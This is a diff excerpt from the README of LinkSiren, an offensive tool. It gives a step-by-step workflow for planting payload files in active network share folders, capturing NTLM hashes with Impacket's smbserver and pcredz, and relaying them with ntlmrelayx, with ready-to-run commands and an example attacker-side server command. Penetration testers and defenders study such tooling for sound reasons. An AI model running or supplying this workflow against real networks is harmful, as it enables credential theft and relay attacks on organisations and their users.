gjhami/LinkSiren/README.md

 #    I recommend crackmapexec or shareenum
 # 2. Use LinkSiren to identify the most active folders on them
 #    Note: You may fine tune the --max-depth, --active-threshold, --fast, and --max-folders-per-share params as necessary
+#    Note: Specify '.' as the domain to log in using a local user account
 python link_siren.py --username <username> --password <password> --domain <domain.tld> --targets <shares file> --identify
 # 3. Use LinkSiren to deploy payloads to all of the active folders
 #    --identify saves UNC paths to active folders in folder_targets.txt
 python link_siren.py --username <username> --password <password> --domain <domain.tld> --targets folder_targets.txt --deploy
 # 4. Let the hashes come to you and relay them as you see fit :)
 #    Use CrackMapExec and LdapRelayScan for relay target identification
-#    Use Impacket's ntlmrelayx for relay or smbserver for capture on the attacker machine
+#    Use Impacket's ntlmrelayx for relay or smbserver + pcredz for capture on the attacker machine
+#    Ex. impacket-smbserver . . -smb2support
 # 5. Cleanup the payload files when you're finished gathering.
 #    Set targets to a file containing UNC paths of all folders where payloads were written
 #    --deploy saves UNC paths to deployed payloads in payload_folders.txt